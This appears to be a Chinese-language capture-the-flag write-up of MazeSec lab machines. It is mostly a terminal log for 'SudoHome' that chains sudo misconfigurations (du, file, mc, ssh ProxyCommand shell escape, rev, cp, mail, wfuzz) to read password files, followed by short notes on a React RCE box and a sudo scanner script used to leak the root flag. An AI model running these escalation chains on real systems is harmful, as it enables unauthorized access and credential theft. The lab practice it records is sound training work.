MazeSec靶机合集

SudoHome

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
WARNING: Could not obtain IP address for interface eth0. Using 0.0.0.0 for
the source address, which may not be what you want.
Either configure eth0 with an IP address, or manually specify the address
with the --arpspa option.
Interface: eth0, type: EN10MB, MAC: 00:0c:29:66:2a:e1, IPv4: (none)
ERROR: Could not obtain interface IP address and netmask
ERROR: pcap_lookupnet: eth0: no IPv4 address assigned
                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:66:2a:e1, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:d9:9b:56       (Unknown)
192.168.56.120  08:00:27:ab:f8:5f       (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.876 seconds (136.46 hosts/sec). 3 responded
                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -p- 192.168.56.120        
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-05 11:48 +08
Nmap scan report for 192.168.56.120
Host is up (0.00037s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
25/tcp open  smtp    Postfix smtpd
| ssl-cert: Subject: commonName=PyCrt.PyCrt
| Subject Alternative Name: DNS:PyCrt.PyCrt
| Not valid before: 2025-04-01T14:05:29
|_Not valid after:  2035-03-30T14:05:29
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: moban, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:AB:F8:5F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host:  moban; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.38 seconds
                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# ssh user1@192.168.56.120            
user1:0woA8Sr7I83R0ZwmnTcH
user1@192.168.56.120's password: 
Linux SudoHome 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Nov 22 21:29:24 2025 from 192.168.56.102
user1@SudoHome:~$ sudo -l
Matching Defaults entries for user1 on SudoHome:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user1 may run the following commands on SudoHome:
    (user2) NOPASSWD: /usr/bin/du
user1@SudoHome:~$ sudo -u user2 /usr/bin/du --files0-from=/home/user2/password.txt
/usr/bin/du: cannot access 'tLPi3BLMG2zmwvZ5z9rh'$'\n': No such file or directory
user1@SudoHome:~$ su user2
Password: 
user2@SudoHome:/home/user1$ sudo -l
Matching Defaults entries for user2 on SudoHome:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user2 may run the following commands on SudoHome:
    (user3) NOPASSWD: /usr/bin/file
user2@SudoHome:/home/user1$ sudo -u user3 /usr/bin/file -f /home/user3/password.txt
TFqxDyfGO69DP1lyjt0f: cannot open `TFqxDyfGO69DP1lyjt0f' (No such file or directory)
user2@SudoHome:/home/user1$ su user3
Password: 
user3@SudoHome:/home/user1$ sudo -l
Matching Defaults entries for user3 on SudoHome:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user3 may run the following commands on SudoHome:
    (user4) NOPASSWD: /usr/bin/mc
user3@SudoHome:/home/user1$ sudo -u user4 /usr/bin/mc

user4@SudoHome:/home/user1$ 3
bash: 3: command not found

user3@SudoHome:/home/user1$ su user4
Password: 
user4@SudoHome:/home/user1$ sudo -l
Matching Defaults entries for user4 on SudoHome:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user4 may run the following commands on SudoHome:
    (user5) NOPASSWD: /usr/bin/ssh
user4@SudoHome:/home/user1$ sudo -u user5 /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
$ whoami
user5
$ cat /home/user5/password.txt
GZ5KErjFycaYHZGj7GcI
$ exit
kex_exchange_identification: Connection closed by remote host
Connection closed by UNKNOWN port 65535
user4@SudoHome:/home/user1$ su user5
Password: 
user5@SudoHome:/home/user1$ ls
password.txt
user5@SudoHome:/home/user1$ sudo -l
Matching Defaults entries for user5 on SudoHome:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user5 may run the following commands on SudoHome:
    (user6) NOPASSWD: /usr/bin/rev
user5@SudoHome:/home/user1$ touch /tmp/password.txt
user5@SudoHome:/home/user1$ chmod 777 /tmp/password.txt
user5@SudoHome:/home/user1$ sudo -u user7 /usr/bin/cp /home/user7/password.txt /tmp/password.txt                                         
                                                                                                                                         
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for user5: 

exitSorry, try again.
[sudo] password for user5: 




Sorry, try again.
[sudo] password for user5: 


sudo: 3 incorrect password attempts
user5@SudoHome:/home/user1$ 
user5@SudoHome:/home/user1$ 
user5@SudoHome:/home/user1$ sudo -u user6 /usr/bin/rev /home/user6/password.txt | rev
Z5cWU36wQhxAVGJbGwoL
user5@SudoHome:/home/user1$ su user6
Password: 
user6@SudoHome:/home/user1$ sudo -l
Matching Defaults entries for user6 on SudoHome:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user6 may run the following commands on SudoHome:
    (user7) NOPASSWD: /usr/bin/cp
user6@SudoHome:/home/user1$ sudo -u user7 /usr/bin/cp /home/user7/password.txt /tmp/password.txt
user6@SudoHome:/home/user1$ cat /tmp/password.txt
HLoKAOu86miWIYKdyVx3
user6@SudoHome:/home/user1$ su user7
Password: 
user7@SudoHome:/home/user1$ sudo -l
Matching Defaults entries for user7 on SudoHome:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user7 may run the following commands on SudoHome:
    (user8) NOPASSWD: /usr/bin/mail
user7@SudoHome:~$ sudo -l
Matching Defaults entries for user7 on SudoHome:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user7 may run the following commands on SudoHome:
    (user8) NOPASSWD: /usr/bin/mail
user7@SudoHome:~$ sudo -u user8 mail -f password.txt
mail: password.txt: Permission denied
user7@SudoHome:~$ ls
password.txt
user7@SudoHome:~$ pwd
/home/user7
user7@SudoHome:~$ cd ..
user7@SudoHome:/home$ cd user8
user7@SudoHome:/home/user8$ ls
password.txt
user7@SudoHome:/home/user8$ sudo -u user8 mail -f password.txt
Mail version 8.1.2 01/15/2001.  Type ? for help.
"password.txt": 0 messages
& ?
& !cat password.txt
UxeGoUq8xqBRxyWVQPYK
!
& ^CInterrupt
& 
At EOF
& exit
user7@SudoHome:/home/user8$ su user8
Password: 
user8@SudoHome:~$ ls
password.txt
user8@SudoHome:~$ sudo -l
Matching Defaults entries for user8 on SudoHome:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user8 may run the following commands on SudoHome:
    (user9) NOPASSWD: /usr/bin/wfuzz
user8@SudoHome:~$ sudo -u user9 wfuzz -z file,/home/user9/password.txt
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
 /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Bad usage: You must specify an URL.
user8@SudoHome:~$ sudo -u user9 wfuzz -z file,/home/user9/password.txt http://192.168.2.60:81/FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.2.60:81/FUZZ
Total requests: 1

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                
=====================================================================


Total time: 0
Processed Requests: 0
Filtered Requests: 0
Requests/sec.: 0

 /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Pycurl error 7: 
user8@SudoHome:~$ sudo -u user9 wfuzz -z file,/home/user9/password.txt http://192.168.56.120:81/FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.120:81/FUZZ
Total requests: 1

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                
=====================================================================


Total time: 0
Processed Requests: 0
Filtered Requests: 0
Requests/sec.: 0

 /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Pycurl error 7: Failed to connect to 192.168.56.120 port 81: Connection refused
user8@SudoHome:~$ sudo -u user9 wfuzz -z file,/home/user9/password.txt http://192.168.56.120:80/FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.120:80/FUZZ
Total requests: 1

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                
=====================================================================

000000001:   404        9 L      31 W       276 Ch      "peqkSBCDKvVxxNwcq1j4"                                                 

Total time: 0
Processed Requests: 1
Filtered Requests: 0
Requests/sec.: 0

这个从user1到读root的flag，用了九种sudo提权方法和一个目录性质+软链接读取文件

这个倒是可以拿去当sudo风暴的教材了，可以被称为小sudo风暴

Creds

React

这个是最近很时髦的那个cve核弹级漏洞的机器，可惜我在这块领域还并不熟练，并不能对这个洞进行代码审计来分析原理，只能当个脚本小子来打这个靶机

(cao了，没想到CISCN也考了这个，那我直接爽到起飞了)

直接利用现成脚本打

进来之后检查sudo位，发现了可利用的脚本，可以用-l参数来读入文件

bot@React:~$ sudo /opt/react2shell/scanner.py -l /root/root.txt -o /tmp/test/<t2shell/scanner.py -l /root/root.txt -o /tmp/test/r                         oot.txt --all-result

brought to you by assetnote

[*] Loaded 1 host(s) to scan
[*] Using 10 thread(s)
[*] Timeout: 10s
[*] Using RCE PoC check
[!] SSL verification disabled

[ERROR] flag{root-bc29a7159b63b18dc294002be32e1c22} - Connection Error: HTTPSConnectionPool(host='flag%7broot-bc29a7159b63b18dc294002be32e1c22%7d', port=443): Max retries exceeded with url: / (Caused by NameResolutionError("HTTPSConnection(host='flag%7broot-bc29a7159b63b18dc294002be32e1c22%7d', port=443): Failed to resolve 'flag%7broot-bc29a7159b63b18dc294002be32e1c22%7d' ([Errno -2] Name or service not known)"))

============================================================
SCAN SUMMARY
============================================================
  Total hosts scanned: 1
  Vulnerable: 0
  Not vulnerable: 1
  Errors: 0
============================================================

[ERROR] Failed to save results: [Errno 2] No such file or directory: '/tmp/test/root.txt'

读到了flag，这里也可以爆破shadow文件的hash，来获取root的密码

babyAD

最爱AD的一集，哈哈哈

Hellman

这个真的牛了，我打了大概有6个小时，终于是打了出来(虽然作者说难度是easy)

入口很好打，是个hellman的密码学挑战，交给AI写一个交互式脚本即可解决这个问题